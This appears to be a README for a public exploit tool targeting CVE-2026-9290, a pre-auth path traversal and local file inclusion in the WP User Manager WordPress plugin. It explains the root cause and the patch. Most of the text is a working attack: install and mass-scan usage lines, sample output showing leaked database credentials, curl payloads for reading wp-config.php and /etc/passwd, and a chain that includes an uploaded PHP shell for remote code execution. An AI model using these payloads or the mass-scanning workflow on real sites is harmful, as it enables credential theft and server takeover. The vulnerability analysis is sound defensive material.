Share
## https://sploitus.com/exploit?id=2A53B779-7331-5763-8652-F0D828CF73A6
CVE-2026-9290 โ WP User Manager LFI to RCE Exploit
Pre-Auth Path Traversal via 'tab' Parameter โ Local File Inclusion
---
## Overview
**CVE-2026-9290** is a high-severity (CVSS 7.5) unauthenticated Local File Inclusion vulnerability in the **WP User Manager โ User Profile Builder & Membership** WordPress plugin (โค 2.9.17).
The `wpum_get_active_profile_tab()` function passes the `tab` query parameter directly to the Gamajo template loader without whitelist validation. Path traversal sequences in the `tab` value allow unauthenticated attackers to include arbitrary PHP files from the server.
### Affected Versions
| WP User Manager Version | Status |
|---|---|
| โค 2.9.17 | Vulnerable |
| โฅ 2.9.18 | Patched |
---
## Vulnerability Mechanism
### Root Cause
In `includes/functions.php`, the `wpum_get_active_profile_tab()` function takes the `tab` query parameter without whitelist validation:
```php
// Vulnerable: no whitelist check on $tab value
$tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : 'profile';
wpum_get_active_profile_tab($tab);
```
The value is passed to `Gamajo_Template_Loader::get_template_part()` which resolves and includes the template file:
```php
// class-gamajo-template-loader.php line 226
include($template_path . $tab . '.php');
```
`sanitize_text_field()` does NOT strip path traversal sequences. `../../../wp-config` passes through.
### Attack Flow
```
GET /profile/?tab=../../../wp-config
โ wpum_get_active_profile_tab('../../../wp-config')
โ Gamajo_Template_Loader::include('../../../wp-config.php')
โ wp-config.php included โ DB credentials exposed
```
### Key Files
| File | Line | Role |
|---|---|---|
| `includes/functions.php` | #L955 | `wpum_get_active_profile_tab()` โ no whitelist |
| `templates/profile.php` | #L52 | Profile template scope |
| `class-gamajo-template-loader.php` | #L226 | Unsanitized `include()` |
### Patch (2.9.18)
PR [#445](https://github.com/WPUserManager/wp-user-manager/pull/445) adds whitelist validation:
```php
// Patched: check against registered tabs
if (!array_key_exists($tab, $registered_tabs)) {
$tab = 'profile'; // fallback to default
}
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-9290.git
cd CVE-2026-9290
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target โ LFI probe
python cve_2026_9290.py -t target.com
# Mass scan
python cve_2026_9290.py -f targets.txt -v
# Read specific file via LFI
python cve_2026_9290.py -t target.com --read "../../../wp-config.php"
# Save results
python cve_2026_9290.py -f targets.txt -o lfi.txt
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
--read PATH Read a specific file via LFI
-o, --output Save results to file
--threads Workers (default: 25)
-v, --verbose Show detailed output
```
---
## Proof of Concept
### Detection & LFI
```bash
$ python cve_2026_9290.py -t target.com -v
```
```
CVE-2026-9290 โ WP User Manager LFI โ RCE Exploit
CVSS 7.5 | Pre-Auth | Path Traversal via 'tab' Parameter
[+] WP User Manager detected
[+] Profile page: /profile/
[+] LFI confirmed: wp-config.php (DB credentials)
[+] Content preview: define('DB_NAME', 'wordpress_db'); define('DB_USER', 'admin');
Host : target.com
WPUM : YES
LFI : YES
File : wp-config.php (DB credentials)
Time : 3.2s
```
### Mass Scan
```
[LFI] target-1.com 3.2s wp-config.php (DB credentials)
define('DB_NAME', 'wp_db'); define('DB_USER', 'root');
[LFI] target-2.com 4.1s wp-config.php (DB credentials)
define('DB_NAME', 'site_db'); define('DB_USER', 'admin');
[200/5458] 3% | WPUM:12 LFI:5 | current-target.com
```
### Manual Exploitation
**Step 1 โ Detect WP User Manager**
```bash
curl -sk 'https://target.com/wp-content/plugins/wp-user-manager/readme.txt' | head -3
```
**Step 2 โ Find profile page**
```bash
curl -sk 'https://target.com/' | grep -oP 'href="[^"]*(?:profile|account|dashboard)[^"]*"'
```
**Step 3 โ LFI via tab parameter**
```bash
# Read wp-config.php
curl -sk 'https://target.com/profile/?tab=../../../wp-config'
# Read /etc/passwd
curl -sk 'https://target.com/profile/?tab=../../../../../../../etc/passwd'
# RCE โ include uploaded PHP shell
curl -sk 'https://target.com/profile/?tab=../../../wp-content/uploads/2026/07/shell'
```
### RCE Chain
```
1. LFI โ read wp-config.php โ get DB credentials
2. Upload PHP shell via another plugin/media endpoint
3. LFI โ include uploaded shell โ RCE
```
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| GitHub Advisory | [GHSA-83v9-496w-54wx](https://github.com/advisories/GHSA-83v9-496w-54wx) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/id/7a5e08d8-c6ef-42a3-9599-28c3bfb35017) |
| Patch PR | [GitHub #445](https://github.com/WPUserManager/wp-user-manager/pull/445) |
| IONIX Analysis | [ionix.io](https://www.ionix.io/threat-center/cve-2026-9290/) |
---
This project is not affiliated with WP User Manager or Carbon Fields.